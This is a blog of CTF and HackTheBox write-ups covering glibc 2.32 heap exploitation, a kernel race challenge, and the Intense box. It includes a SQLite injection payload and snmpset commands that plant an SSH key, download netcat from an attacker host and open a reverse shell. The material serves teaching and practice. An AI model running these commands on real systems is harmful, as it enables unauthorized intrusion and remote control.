Search This Blog

Wednesday, December 30, 2020

Yet Another House ASIS Finals 2020 CTF Writeup

A few weeks ago, I played with DiceGang in Asis Finals CTF. Yet Another House was one of the heap pwnables, and it only had only one solve (which was by us). The general gist of it involved doing a glibc 2.32 poison null byte attack without a heap leak, a tcache stash unlink attack to overwrite mp_.tcache_bins, and a tcache poison for controlled arb write to escape seccomp for the flag. I didn't plan on making a writeup for this originally, but when redoing this complex pwnable a few weeks later, I thought it would be good for me to make some detailed notes so I don't forget about these techniques.

Before I start, I would like to thank the teammates who worked with me on this: Poortho (who did the majority of the work and blooded it), NotDeGhost, Asphyxia, and noopnoop. 

Initial Work:

One thing to note immediately is the patch the author introduced into the glibc library. 


He effectively disabled the possibility of attacking global_max_fast. 

Now, reversing this binary (all protections are enabled):

Inside initialize, a 0x20 chunk is allocated and the address of the tcache_perthread_struct is recorded. According to seccomp-tools, only open, read, write, mprotect, clock_nanosleep, rt_sigreturn, brk, exit, and exit_group were allowed. Also note that this program doesn't return, only uses read() and write(), and exits with _exit, which means our seccomp escape probably will not use FSOP. 

From the allocation function, we know that our requested sizes must be greater than 0x100 and less than or equal to 0x2000. We also have 0 to 18 slots inclusive (so 19 total). The read_data function (which I didn't show) null terminates. I would say that this function overall is safe. The malloc_wrapper function performs another important task:

Seems like it wipes the tcache_perthread_struct everytime you call malloc :(


The delete function is safe and nulls out the size and chunk array indices respectively.


The leak function itself is also safe. I didn't show the code for write_1 here, but it only writes the number of bytes based on strlen(data), so if we want to use this for leaks, we have to be very careful to not introduce null bytes before the leak.


And here, we have a classic CTF heap note bug... the infamous null byte poisoning, as it adds a null byte one after the amount read in. Note that this function can only be used once, unless you reset the sanity value, but it wasn't necessary in this exploit.

The last thing to take note of is the libc leak for unsorted bin fd and bk pointers end with a null byte in this libc, which will prove slightly troublesome later on.

Observations:

From the reversing above, we can conclude several things and propose a basic exploit path.

Fastbins can just be ignored due to the allocation size ranges and the fact that we can't change global_max_fast due to the custom patch. 

Tcachebins (or at least the original ones that are placed within the 0x280 tcache_perthread_struct) can be used, as long as you do not allocate - this is a key concept! You can also use malloc() to wipe the struct as a way to help you during your heap massage (Ex. if you want to leave a permanent chunk in between two chunks that would otherwise coalesce).

By glibc 2.32, there are many more mitigations. As documented in my Player2 writeup, glibc introduced a mitigation against poison null byte where it checks the size header compared to the prev_size header and ensures that they are the same before back coalescing. However, this time, we cannot just forge some headers easily like in Player2 via a heapleak to beat the unlink check. We will have to use the fact that glibc doesn't zero out the pointers for heap operations involving the unsorted and large bin (as each unique sized chunk in largebin has 2 sets of pointers, with the bottom two being fd_nextsize and bk_nextsize to help it maintain the sorted order). This technique has been documented in the following links (though some of them rely on the aid of fastbin pointers which we do not have): BalsnCTF Plainnote writeup, poison null byte techniques2.29 off by null bypass (like many pwnable writeups, Chinese CTF players often document some of the coolest and most obscure techniques, but Google Translate should suffice).

An interesting thing to note is that in 2.32, the tcache_perthread_struct no longer uses uint_8 to store tcache counts; it now uses uint_16. Hence, if we can place chunks in around the 0x1420ish range into the tcache_perthread_struct, the memset will not be able to wipe the tcache count (and the pointer as well). Some of you may recall that the tcache count did not matter before as long as you had a pointer in the tcache_perthread_struct (as I believe those checks were once asserts in tcache_get that got compiled out for release builds), but now, there are sanity checks against such behavior; this is why we need to allocate potential chunks for the tcache bin that has its count placed outside the memset range.

In order to expand the size of chunks we can place into the tcache, we can attack the malloc_par struct, with the symbol mp_ in libc. Take careful note of the tcache_bins member.

By overwriting that with a large value (such as a libc address), we can place larger chunks into tcache and to bypass the wipe.

Normally, this type of write makes me think of an unsorted or largebin attack. However, since 2.28, unsorted bin attack has been patched with a bck->fd != victim check, and in 2.30, largebin attack has been hardened against, but how2heap still shows a potential way to perform this attack (I took a closer look at the newer version of this attack after the CTF; though I did not end up testing whether this would actually work in this challenge, it could potentially have offered a much easier alternative with the simpler setup). Another way to achieve this write in glibc 2.32 is to perform what is known as the tcache stashing unlink attack, which I learned from the following links: Heap Exploit v2.31, Tcache Stashing Unlink Attack.

The relevant source for this attack is here:

Basically, when we have chunks inside a specific smallbin, causing malloc to pull from this smallbin will trigger a transfer of chunks into the respective tcache bin afterwards. Notice the point about bck = tc_victim->bk and bck->fd = bin during the stashing process. By corrupting the bk pointer of a smallbin, we can write a libc address into a selected address + 0x10. We must take note to do this only when tcache is one spot away from being filled so the stashing procedure can end immediately afterwards, avoiding any potential corruption. Most writeups would first start out with 6 tcache bins filled and then 2 smallbins, so you can pull out one smallbin and corrupt the bk of the last one (as smallbins are FIFO structures with chunks removed from the tail), trigger the stash process, and have it end immediately as tcache would become full. However, in this case, our tcache_perthread_struct always gets wiped, so we actually need 8 chunks in the smallbin; 1 to pull out, 6 to stash, and the final one to stash and write. Regardless of what happens, this respective smallbin will be corrupted and cannot be used again. If curious, readers can check out the stash unlink+ and stash unlink++ versions of this attack to get an arbitrary address allocation or an arbitrary address allocation and a write of a libc address somewhere in memory.

One more new protective feature in libc 2.32 is pointer obfuscation/safe linking, which I discussed previously in my CUCTF Dr. Xorisaurus writeup, where (stored pointer) = (address of fd pointer >> 12) ^ (fd pointer) for singly linked lists. Once we achieve a heap leak, this protection mechanism is trivial to beat, and the new aligned address check for these lists won't matter as we will be targeting __free_hook.

Lastly, since this writeup requires a lot of heap massaging involving smallbin and largebin, I recommend reviewing this page from the Heap Book for all the conditions. It didn't turn out to bad when writing this exploit as a lot of it just relied on some intuition and checking in a debugger.

Exploit Development:

I recommend closely following around with a debugger, as sometimes my explanations might be wrong or I might have misexplained a small step due to the complexity of this exploit.

To start off, I wrote some helper functions:

Our first goal is to create a massive back coalesce with the poison null byte so we can perform overlaps. This part took quite a while, but Asphyxia ended up figuring this out late at night with the following general technique using largebins, unsorted bins, and normal back coalescing.

Several chunks are allocated, and then three chunks of different sizes (but same largebin) are freed into the unsorted. A chunk larger than all three were requested, causing a new chunk to be pulled from wilderness and the 3 unsorted chunks to be sorted into the same largebin in order, with 2 sets of pointers filled for each due to them having unique sizes. Notice how the one of the middle size has its first set of pointers aligned at an address ending in a null byte; this is purposeful as we will later forge a fake size header over the first set of pointers here, and can perform partial overwrites on other chunks with dangling pointers with just a single null byte from the alloc function to align and pass the unlink check. 

Note that I didn't fill the middle chunk with as many characters since I will forge a fake chunk header there soon as it will be the target to back coalesce onto; as the back coalesce region will be quite large, I have to leave the part after the pointers as null bytes (or at least the 1 qword afterwards) as glibc unlink performs additional operations when the previous chunk is of large size and has non null fd_nextsize pointers.

Next, Asphyxia freed the chunk before the chunk in the middle largebin, causing it to back coalesce (while also leaving the 2 sets of pointers behind for me to use) and go into unsorted. Another allocation is made so that the first set of pointers left behind can be used to fake a chunk header, and the next set of pointers can be used as part of the way to beat the unlink checks (I chose a fake size chunk of 0x2150).

Then, we cleared out the unsorted bin, and recovered the other two largebins, to then build an unsorted chain. Order of freeing now matters here for unsorted bins. We want to have the chunk underneath the fake headers to be in the middle, so its address in the unsorted chain can be used and changed to the fake chunk with just a null overwrite (as they are all in the 0x......7XX range). 

Now we want to recover the the 0x440 chunk in unsorted, write a single null byte there to satisfy the fd->bk == P check. We want to do the same thing on the 0x460 chunk; in order to preserve its pointers, we will back coalesce it with a chunk before it so the pointers are preserved. Then, an allocation can be made to place a null byte to change the 0x720 ending into a 0x700 ending, and the unlink check will be satisfied. Later on, when I trigger the malicious back coalesce, I will also manage to get some heap pointers in these two chunks for a heap leak due to how unlink works. Notice how the forged chunk has the perfect pointer chain setup to pass the unlink check.

Afterwards, I cleaned up the remaining largebin and unsorted bin, and performed a few more allocations just to expand the number of chunks I would have overlapped. I then allocated a few more chunks of 0x110 size (which I will use later for the tcache stash unlink attack), with some additional fake chunk metadata to allow me to free a fake 0x1510 chunk later, which I plan to use for the tcache poison attack. My final 0x110 chunk allocated is meant to just prevent consolidation later depending on the order of how I build my smallbin chain and I cannot use it as this extra spot is crucial for the later massage.

I triggered the poison null byte after setting the correct prev_size metadata and created a massive unsorted bin that overlapped a lot of memory after I freed the poisoned chunk.

Now chunk 3 will have heap pointers. Chunk 5 also does, but my forged size metadata comes before it so you won't be able to leak it from there.

Here, some serious heap massaging begins. During the CTF, Poortho managed to massage it cleanly in 2-3 hours (basically carrying us to the first blood); I remember his exploit having several dangling unsorted and small chains around so it is quite impressive that he managed to keep the heap stable. It took me much longer to massage the heap, and I had to keep it as clean as possible to avoid breaking it.

Since the libc address for unsorted bins started with a null byte, I had to find a way to get a largebin pointer allocated into the beginning of my chunk data for libc leak. I achieved this by first aligning the unsorted bin with one of my chunk data addresses, then allocated a very large chunk (greater than unsorted size) to trigger largebin activity, hence providing me with a libc leak. Two operations were also performed to fix some of the chunks' size metadata that got corrupted and overwritten during these heap manipulations (but they were unnecessary as I had to change all of them in the next stage of the exploit). I lastly allocated another 0x110 chunk into index 10, and used that as an opportunity to fix index 8's chunk size to something valid that will work with free() nicely.

A general technique I used above and one that I will use from now on to fake sizes or forge metadata is one where I allocate one to two massive chunks from the unsorted bin to reach the specified destination, write the data upon allocation, and then free it in the opposite order of allocation to back coalesce it and restore the state of the unsorted bin.

In order to perform a tcache stash attack in a scenario where the tcache_perthread_struct gets wiped on each malloc(), we need to have 15 0x110 chunks to be freed. The first 7 can be freed into tcache, and the next 8 will be freed into unsorted (in which we have to be very careful to avoid chunk coalescing). From there, we can trigger malloc to move all of them into smallbin, and have the chunk inserted into the 0x110 smallbin last be overlapped to have its bk pointer tampered with; this way we can still stash attack without crashing and have the final chunk entering tcache perform the write. At the current stage, we only have 0x110 chunks in 12, 13, 14, 15, 16, 17, 2, 4, 7, 10, and we will need 5 more. Here is the program chunk array as of now:

The ones marked with X are the 0x110 chunks (or at least should have that as the size and I have to repair them later). The ones marked with S are towards the end of the unsorted overlap, and hence I would like to save them for the overlap writes later. I plan on saving one for the tcache poison, one for the smallbin bk pointer corruption, and just one extra for backup/padding purposes (in the end, I didn't even need it); these were index 1, 6, and 9. 

To free up the other chunks, I performed the technique mentioned above (allocate one to two chunks, write the correct size or just spam with 0x21 sizes, and recoalesce back to restore unsorted chunk) on chunks 3 and 5 to make them isolated 0x20 sized chunks (size for index 8 has already been changed in the last 0x110 allocation), on chunk 9 to make it into size 0x1510, and applied it one last time to fix some of the 0x110 chunk size metadata that I may have overwritten. Chunk 11 can be freed before all of these operations by just having it back coalesce into the large unsorted bin. I will also free 0, which will add one more unsorted chunk into the unsorted bin, but luckily it didn't raise any new issues I had to deal with in the heap massage later. We should have 6 free spots at this point; 5 for additional 0x110 chunks and one for padding/alignment purposes to create an overlap.

Now, I added 5 more 0x110 chunks. This cannot just be done as directly as such. Rather, I performed the allocations (and some frees) in such a way such that the unsorted bin created from freeing chunk 0 runs out after 3 0x110 chunk allocations. Then I allocated another 0x110 chunk, allocated a large chunk that extended into index 6 chunk's data (which we control), and allocated a 0x110 chunk from there (providing us with an overlap over a potential smallbin). Since we know that for this last chunk will go into unsorted before smallbin, I had to ensure that it will not coalesce with the neighboring unsorted, so I freed a previous 0x110 chunk and allocated one more from unsorted to act as a guard chunk; the nice thing about the tcache memset is that I can free smaller chunks like these to help with the heap massage without worrying about their return.

One thing to note is the reason for which I chose index 6 to be the one to overlap and overwrite the last smallbin bk. I mentioned it above in the code comments, but it's because there was a 0x110 chunk after it and it was also the first of the three chunks I kept in memory.

At this stage, we have 15 chunks of 0x110 size: index 0, 2, 3, 4, 5, 7, 8, 10, 12, 13, 14, 15, 16, 17, 18. To avoid any coalescing and keep these number of chunks for the tcache and smallbin frees, I closely considered the following rules I know (which you can see from debugging):

1. 12 to 17 is a chain (17 won't coalesce into top even if it is treated as unsorted due to a guard chunk placed below early on)

2. 12 will back coalesce into the large unsorted if not entered into tcache.

3. 0, 3 is a chain

4. 8, 10 is a chain

5. 5 is on top of the big unsorted chunk

6. 2, 4 are isolated

7. 7 has the potential to go into unsorted and merge with a smallbin

8. 18 must be the last one into the smallbin

Following these observations, I performed the following free chain: 14, 16, 3, 10, 5, 12, 7 (tcache filled, now into unsorted), 17, 2, 13, 15, 0, 8, 4, 18. I then made a larger allocation to trigger the transfer to smallbin of the 8 unsorted 0x110 chunks and freed this larger chunk to restore the large unsorted bin's state.

Note that pwndbg labels the doubly linked bins as corrupted whenever I go over 4-5 chunks in them, but in reality, they are fine.

Since we don't have edit anymore, I had to free index 6 into unsorted, and then allocate for it to get it back and perform the overwrite over the index 18 0x110 small chunk to write a libc address into mp_.tcache_bins. Making another request into the smallbin should trigger the stash. 0x110 smallbin is also corrupted afterwards and you should avoid allocating from it.

Between index 1 and 9, I chose to use 9 for my tcache poison. To set this up, I first allocated a large enough chunk to make the unsorted bin small enough so that when I ask for a 0x1510 allocation, it pulls from wilderness. I then freed this new chunk, and then index 9 (which had its size overwritten with 0x1510). Due to the new mp_.tcache_bins value, a tcache chain is created here that is not reached by the 0x280 byte memset hooked onto malloc.

Then, I pulled from a chunk from the large unsorted chunk we had to overlap into what was index 9, and following the pointer obfuscation rules, changed it to __free_hook.

Now, we must decide on how to escape the seccomp filter. Of course we will need to do an open read write rop chain, however how can we pivot with only control over __free_hook (which implies we have control over rdi)? 

One idea that we had was setcontext, which is a well known function to use as a stack pivot.

However, starting around libc-2.29 (?) it relied on rdx instead of rdi, and we do not have control over rdx. After some attempts at FSOP and forcing in a format string attack, Poortho and I discovered an extremely powerful COP gadget (which exists in many (newer?) glibc versions) that allows us to control rdx from rdi and call an address relative to rdx. In this libc, it was the following:

mov rdx, qword ptr [rdi + 8]; mov qword ptr [rsp], rax; call qword ptr [rdx + 0x20];

This makes it relatively trivial as we can just set up the heap for the ROP (take care of the one push rcx instruction setcontext undergoes). I went for a mprotect to change heap to rwx, and then pivoted it to shellcode on the heap to open read write exit. Due to my previous spamming of 0x21 metadata, I was not able to allocate again from some of the larger chunks, but I had enough left in the unsorted bin to pull smaller chunks out. Here is the final bit of my exploit:

Final Exploit:

Do note that in this writeup, I nop'd out the sleep for the sake of local testing. However, running it with the provided ynetd binary (as the CTF server is no longer up) with a 3 second timeout for each option added onto my script still had it over 10 minutes under the sigalarm limit, so it should have been fine during the actual competition scenario.

Concluding thoughts:

While this challenge was overall pretty decent as it showed some up to date glibc tricks, I felt that some of the elements were unnecessary and added artificial difficulty. This challenge could have been just as difficult conceptually if it allowed for 2-3 more allocation spots (rather than force players who have the correct plans to rewrite their exploit several times), and combining a sigalarm with a 2 second sleep in the main menu didn't add any value. Additionally, while the custom patch made in this libc makes sense and did contribute to overall quality, I do see libc patching happening more often and hope CTF authors do not abuse it to create extremely contrived heap note problems.

Feel free to let me know if I made any mistakes in my explanations (as this problem was quite complex), congrats to Poortho for taking first blood, and thanks again to all those teammates that worked with me in DiceGang, which placed 4th overall!

Saturday, November 14, 2020

Intense HacktheBox Writeup

 

Intense was a hard box involving some web exploitation techniques such as sqlite injection and hash extension attack, snmp exploitation, as well as an easy pwnable for root. Overall, I thought sokafr did a great job with this box.

To begin, our initial port scan revealed the following ports from masscan:

22/tcp  open   ssh     syn-ack ttl 63

80/tcp  open   http    syn-ack ttl 63

161/tcp closed snmp    reset ttl 63

Opening up port 80, we see the following:


It provides us with guest:guest as credentials, as well as a link to the zipped source code, which we can download. Inside, you can find some templates and other misc. info, but the most important files are the 4 python files of this flask app (which uses a sqlite database): utils.py, lwt.py, app.py, and admin.py.

Some important takeaways from this include the following observations:

The user information from here is stored in the sqlite database, based on the data for username and secret (which is the sha256 hash of your input for password). The usage of query_db() and its behavior makes it safe from sqli at this login point.

The session is built and checked in the following manner at some of the following functions:

To summarize, the cookie is composed of an “auth” cookie, which is composed of 2 base64 portions separated by a period. The first portion is based on the return value of try_login(), which is a dictionary of username and secret. Using this dictionary, it formats the session as username=username;secret=hash;. Afterwards, the cookie gets a signature from the previous data by taking the digest of sha256(SECRET + data) where SECRET is a random bytestring of random length between 8 and 15; this is the second portion of the cookie. Then both the data and this signature are encoded and returned for the cookie value of “auth.” In many subsequent operations, get_session() is called, which calls parse_session(), which first verifies the contents of the data with the signature. Interestingly enough, if you find a way to bypass this verification, the way parse_session() behaves would allow you to append data to replace keys that get already set in the loop beforehand.

Becoming admin lets you interact with some interesting functionality:

There's a ridiculously obvious lfi here. Now, would there be any endpoints that would allow us to extract data to become admin?

Let's take a look at a feature the guest user has access to, the submitmessage() function:

You're restricted to a 140 byte message, and there are some blacklisted words. However, now query_db isn't even really used “correctly," as the application is just directly formatting your input in, leading to an obvious sqlite injection. One thing to note is that it doesn't really show you the result besides success or failure, so this is a clear case of a error based injection. I just used load_extension when the comparison in my error brute force is false; this would return an authorization error (plus the extension won't even exist). My teammate Bianca had another interesting way to error brute this, relying on passing bad inputs to json_extract when the comparison fails to trigger an error.

Messing around briefly in db-fiddle, I will be basing my script off the following sqli template:

injection: ' or (select case when (select substr(username,1,1) from users limit 1 offset 0) = 'a' then 'W' else load_extension('L', 0x1) end));--

query: insert into messages values ('' or (select case when (select substr(username,1,1) from users limit 1 offset 0) = 'a' then 'W' else load_extension('L', 0x1) end));--')

I wrote the following script to retrieve the admin username and hash with a simple linear brute, as the username probably will just be admin, and the hex charset is small enough:

I ended up recieving the following hash: f1fc12010c094016def791e1435ddfdcaeccf8250e36630c0bc93285c2971105

But it's not crackable with any wordlist or rule combination I have... this is where the way the application signs sessions and checks them comes in. Remember how it signed it with the secret in front before hashing? Under these conditions, sha256 is vulnerable to the hash extension attack. This post explains this attack much better, as I just ended up relying on the hash_extender tool. In our case, we know the hash function, the data, as well as the original signature, so we have all the conditions ready for this attack, in which we append data to it to generate a valid signature without knowing the secret (and appending the data can make us admin since the session parser doesn't check for duplicates). As for the attack, the general gist is that if you know the state of a hash, you can create a valid hash with appended data to the input to the function by setting the hashing algorithm state back to the signature's value, so the algorithm continues to hash from there (and this will produce a valid result!).

Since the secret is a variable length, I wrote the following script to bruteforce a valid session:

Now, with a valid session, we can go to the admin functions and perform lfi.

With some requests, I also noticed the user flag (and the source code for the pwnable) in the user directory with payload ../../../../../../../../../home/user.

Recalling our earlier enumeration, I remember the snmp port. Pulling out /etc/snmp/snmpd.conf, I see the following:

Seeing the rw communitstring made me immediately think of rce over snmp, which is very well documented here. To quote the article:

The SNMP community string is essentially a plaintext password that allows access to a device’s statistics and configuration.

Since there is a length limit to the payloads (255 chars for command) with nsExtend related operations, I ended up generating a shorter ssh key to give myself ssh access as the Debian-snmp user with the following commands:

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c SuP3RPrivCom90 10.10.10.195 'nsExtendStatus."command"'  = createAndGo 'nsExtendCommand."command"' = /bin/sh 'nsExtendArgs."command"' = '-c "echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAgQC1VxdqPOpZvaJtuvtTMZJlchmQCLw8cC0tvD79eSlaL0hsS0XRFRaAKFf55UP1SarbED+teHFQUPbLa6uJlBxJQrPLQfujmo6su7P2jGPDZrwxIgKA7Om8cUvLXuNdHrTVwze68z7QBCIi6m1ofHBvZJOdWMt6O0idpybWefz7Cw== root@kaliVM > /dev/shm/w"'

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c SuP3RPrivCom90 10.10.10.195 'nsExtendStatus."command"'  = createAndGo 'nsExtendCommand."command"' = /bin/sh 'nsExtendArgs."command"' = '-c "cat /dev/shm/w > /var/lib/snmp/.ssh/authorized_keys"'

Remember to trigger it each time with: snmpwalk -v 2c -c SuP3RPrivCom90 10.10.10.195 nsExtendObjects

When you lfi the source code of the pwnable (note_server.c) earlier on, you can see that it opened its port on 5001, so we can port forward it out:

ssh -N -L 5001:127.0.0.1:5001 Debian-snmp@intense.htb -i key

However, we still need libc and the binary, and from the lfi on passwd, we know Debian-snmp shell is /bin/false. So I ended up popping a shell with the following commands so I can transfer files out (we had to use nohup to prevent snmp from hanging and then crashing, and some fiddling was required for the commands to work):

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c SuP3RPrivCom90 10.10.10.195 'nsExtendStatus."command"'  = createAndGo 'nsExtendCommand."command"' = /usr/bin/nohup 'nsExtendArgs."command"' =  'wget http://10.10.14.9/nc -q -O /dev/shm/nc'

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c SuP3RPrivCom90 10.10.10.195 'nsExtendStatus."command"'  = createAndGo 'nsExtendCommand."command"' = /usr/bin/nohup 'nsExtendArgs."command"' = 'chmod +x /dev/shm/nc'

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c SuP3RPrivCom90 10.10.10.195 'nsExtendStatus."command"'  = createAndGo 'nsExtendCommand."command"' = /usr/bin/nohup 'nsExtendArgs."command"' = '/dev/shm/nc 10.10.14.9 1337 -e /bin/sh'

The following was the source:

This is just a variation of the previous forking stack overflow server pwns I've written extensively about in both my Rope and Patents writeup, so I'll skim through this pwn. It's another forking note app, with PIE, FULL RELRO, and canary (which is trivial to beat once you leak since it is forking).

Your options are ‘\x01’ for write, ‘\x02’ for copy, and ‘\x03’ for show. When you write data, you tell it the length, and it adds the length to an index to check if their sum is over the buffer size. If it's not, you can send in data with specified length size to the note char array starting at the current index, and it increments your index by the buffer size you requested. Do note that you can only send in a byte for the requested size.

For copy, you get 2 bytes to specify an offset, and the offset is checked to remain in the range of 0 and the current index. However, the size to be copied isn't checked, so there is a potential overflow once it copies from the note buffer at the specified offset to the note buffer at the current index. It also increases the index by the specified copy amount, so we can read out of bounds with this as well (as show doesn't check).

For show, there isn't nothing much to know except that it writes out data and returns, so the fork ends.

In my exploit, I basically first increased the index to 1024 and abused copy's lack of checks to extend the index so that the buffer printed with option 3 will leak canary, stack addresses, and pie base. Then I wrote a rop chain with proper padding and canary in front to leak libc addresses in the front of the buffer (and adjusted it to increase the index to 1024), then had it copy the length of the rop itself from offset 0 to the current index (1024), allowing for an overflow to leak libc once we trigger a return with show. Then apply the same principle to dup2 the file descriptors and pop open a shell. Here is my final script:


And that should get us root shell! Thanks once again to sokafr for the fun box, and pottm and bjornmorten for giving my writeup a read through before publishing.

Sunday, October 4, 2020

CUCTF 2020 Dr. Xorisaurus Heap Writeup (glibc 2.32 UAF)

Here is my writeup for my 2.32 glibc heap challenge (Dr. Xorisaurus) from CUCTF 2020; make sure to check out the writeup for my kernel challenge Hotrod as well!

One important concept to note about glibc 2.32 is the new mechanism of safe linking on the singly linked lists. This new protection scheme is discussed in depth here. Basically, for singly linked freelists (fastbins and tcache bins), free chunk fds are obfsucated by the following scheme: (stored pointer) = (address of fd pointer >> 12) ^ (fd pointer). With a heap leak, this protection can be easily bypassed as heap behavior in glibc is predictable, which is what this challenge will revolve around. Bruteforcing or  leaking a copy of the stored pointer and applying some basic crypto knowledge can help you recover the original data as well in some cases (especially when the chunks in the list are close together).

In this challenge, we were given a libc with debug symbols, linker, and patchelf'd binary with the following protections:

Now, when reversing this binary, one should find 4 features. 

You can fill a glass, examine a glass, drain a glass, and switch the contents of the glass according to the menu. There is also an initial sigalarm in the beginning, and you can only have a maximum of 25 glasses. Filling a glass is equivalent to an allocation; it finds an index in the global glasses array for you, requests for a size that is in the range of 0x60 and larger fastbin sizes, and reads in some data. Examining a glass can be useful for leakage, as it just puts() the content of the chunk out; note that examinations can only be used twice (which can be assumed to be for a libc leak and a heap leak). Draining is the equivalent of a free and it is safe as it nulls out the pointer in the global array. You can use this feature as many times as you can, but once you swap contents (feature 4), you can only free one more time. As for the swap function, you can use it to free a chunk, and then immediately reallocate based on 2 choices for sizes. After the allocation, the binary reads in 8 bytes. This where the 8 byte UAF comes in as the conditional is poorly written, so if you select an invalid choice, there will be no re-allocation and you will be reading into the freed chunk's metadata (take a look at the decompilation below). Now let's plan out our exploit:

One might make the mistake of thinking of using swap to create a double free, but the 8 byte UAF won't allow you to change tcache keys so freeing that chunk again will fail a malloc() check. Some might think about filling tcache and then applying a fastbin dup attack, but the fact that you can only free one more time after swapping prevents the bypass against the fastbin double free check. 

To obtain a leak, one might be tempted to just free a chunk and then reallocate it to see the obfuscated pointer (and then shift left by 12 bits to recover heap base). However, the read call during the allocation requires at least one byte (unless pty is enabled server side), so 5 nibbles of the heap address will be missing. This means there would be 1 byte of entropy on the leak, but a proof of work is required for 3 bytes of a random sha256 hash on remote, so bruteforcing isn't as feasible.

A better way to obtain a leak is to abuse the behavior of scanf. When scanf reads in large payloads of characters that follow it's format specifier, scanf will begin to allocate from the heap. For example, if we send in 0x500 '1's, scanf will make a largebin allocation request from the heap. As one familiar with the heap might know, triggering largebin sized allocations will lead to malloc_consolidate() (source), which will go through the freed fastbins and consolidate them to unsorted (source). This malloc_consolidate() is the basis for another type of attack known as fastbin consolidation, which is discussed here in better depth. After malloc_consolidate(), the request for the large allocation will then cause the chunk in unsorted to be sorted into largebin. On the next request, one can use it to request a heap leak. The chunk will then be sorted into unsorted, from which we can easily grab a heap leak (feel free to debug this out when I attach my exploit later on if this seems confusing). This method of leaking really only came up after my teammate c3bacd17 found an unintentional bypass in one of my other challenges.

Once we have the leak, some basic math will allow you to abuse the 8 byte UAF to maliciously corrupt the obfuscated pointer. Note that 2.32 malloc()'s safe linking mechanism also ensures that the deobfuscated pointer is aligned. Because of this and the fastbin size check, we can no longer do the unaligned trick here for fastbin dup. We will have to rely on tcache poisoning here, and an evil obfsucated pointer can be created by xoring the address location of the fd right shifted by 12 bits with the target location.

I ended up targeting __free_hook and changed it to system, then "freed" a chunk with the string "/bin/sh" on it to pop a shell. As for the proof of work on remote, it can easily be handled by the proofofwork python library that automatically generates a proof.

The following is my final exploit with comments:



Hope everyone enjoyed this challenge and writeup! Feel free to let me know if anything needs to be clarified or if anything explained is incorrect. Congrats to lms of Dakota State for blooding this challenge as well!

For those interested in trying this challenge out, it is archived in the CUCTF repos.

CUCTF 2020 Hotrod Kernel Writeup (Userfaultfd Race + Kernel UAF + Timerfd_Ctx Overwrite)

Recently, I made some pwn challenges for my teammate Chirality, who helped organize CUCTF 2020; Dr. Xorisaurus (glibc 2.32 heap) and Hotrod (kernel heap and race). I thought it would be nice to share my writeups for each. You should also check out Chirality's kernel heap challenge for CUCTF, called BYOD.

Before I start, I would like to acknowledge and give appropriate credit to all the links (posted throughout this article) I studied off of to make both this challenge and my exploit possible.

If you have done plenty of glibc heap exploitation before, there is one important idea you should note about kernel heap exploitation. Rather than relying completely on kernel heap feng shui (even though the allocators are much simpler in kernel), it's oftentimes better to utilize certain structures with function pointers for leaks and RIP control. The basis of this challenge is to use a race condition to create a UAF scenario, from which you can hijack timerfd_ctx structures to take control of RIP.

Opening this challenge up, it looks like a standard kernel pwn setup. A file system, bzImage, and a qemu launch script is given. The following two commands will be very handy for manipulating the file system for debugging/analysis purposes:

The qemu launch script is the following:

This tells us that SMEP, KPTI, and KASLR is enabled, but there is no SMAP (which simplifies this a lot).

We can also use vmlinux-extract to help extract the kernel from its compressed file. The driver itself is hotrod.ko based on the startup script (and the name of the challenge). Now, let's do a quick analysis of the driver.

Like many other standard CTF kernel challenges, a miscdevice is created during initialization and a mutex is also initialized. The device also has a file_operations struct where only the unlocked_ioctl field is populated. Looking through hotrod_ioctl, one can also infer that there is a global struct storing both the size as an unsigned long and a pointer to an allocated chunk located at 0x7e0 relative to module base. This function also has an add, show, delete, and edit function, all of which can only be used once (and you only get one hotrod total). Alloc occurs when the ioctl argument is 0xBAADC0DE.

It checks if you have already attempted an allocation and if the hotrod has already been populated. If not, it will allocate a chunk for the hotrod and sets its size to the argument passed in (the size must fall within the 0xd0 to 0xe0 range). There doesn't seem to be a bug here. Delete occurs when the ioctl argument is 0xC001C0DE.

Again, proper checks are ensured, and the hotrod is zeroed out. This feature can also only be used once. Viewing occurs with ioctl command 0x1337C0DE.

Again, it seems quite safe. We can use this for a leak after we allocate and free certain kernel structures though since kmalloc() doesn't zero out memory. Lastly, edit occurs with argument 0xDEADC0DE.


Again, it seems pretty safe. Like the viewing function, the argument is interpreted as like a hotrod struct as well. The sizes for editing (as well for viewing earlier on) are both checked (so no going out of bounds or overflows). In edit's case, if the size check is satisfactory, it will proceed to copy the user's data to the kernel hotrod's car. 

Overall, this module looks quite safe. Where exactly could the bug be? Well, in this ioctl handler, the mutexes were never used, opening this up to race conditions.

Due to the checks on sizes and restriction to only use each feature once, a good race strategy would be to launch edit in one thread, and in another thread, quickly free the chunk and allocate another kernel structure in a way where the second copy_from_user() happens such that the chunk is already freed but the pointer to the chunk is also already passed to the function. A great way to reliably race is with the userfaultfd syscall. With userfaultfd, we can set up a page fault handler over a certain page we mmap in userspace; even when a pagefault occurs for the kernel accessing it, our handler will run, from which we can hang the kernel thread, run the code meant for the race, and then unblock it with a UFFDIO_COPY ioctl where uffdio_copy.mode is not set. This is actually an extremely common technique to reliably race in the kernel, with several articles and CTF challenges including this concept (such as the famous Balsn CTF KrazyNote challenge):

https://blog.lizzie.io/using-userfaultfd.html

https://bbs.pediy.com/thread-217540.htm

https://duasynt.com/blog/linux-kernel-heap-spray



There does seem to a recent hardening against this method of attack as mentioned here, but is not set by default for compatibility reasons.

From our exploit's perspective, we can have one thread call edit and have it copy over a user hotrod struct where the data, or "car," pointer points to a page where we setup a userfaultfd handler for. Then during edit's second copy_from_user(), it will pagefault when it attempts to copy based on our pointer, and our handler will take over from there, from which we can free and allocate other kernel structures over the same region. Then, you can unblock the thread by copying over the data we want placed there. Personally, I kept all the original data with the copy (to avoid corrupting the kernel structure) except for one of the function pointers, which I change to a stack pivot. Now, after the unblock, the code resumes and everything goes back to "normal," until the overwritten function pointer is triggered.

